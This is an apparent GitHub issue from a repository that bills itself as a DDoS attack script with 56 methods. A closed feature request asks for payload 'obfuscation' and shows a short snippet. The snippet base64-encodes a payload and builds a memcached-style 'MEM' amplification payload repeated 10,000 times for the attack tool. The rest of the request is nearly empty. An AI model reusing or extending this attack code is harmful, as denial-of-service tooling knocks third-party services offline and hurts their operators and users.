MatrixTM / MHDDoS

Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods
MIT License
12.83k stars 2.68k forks source link

obuscation and better mem #551

Closed s-b-repo closed 3 months ago

s-b-repo commented 4 months ago

Which section is this feature request for?

L7 (DDoS Attack Layer 7)

Is there an existing issue for this?

Is your feature request related to a problem? Please describe the problem.

import base64

def obfuscate(payload): return base64.b64encode(payload)

elif name == "MEM": payload = b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n' * 10000

Describe the solution you'd like

b

Additional context

No response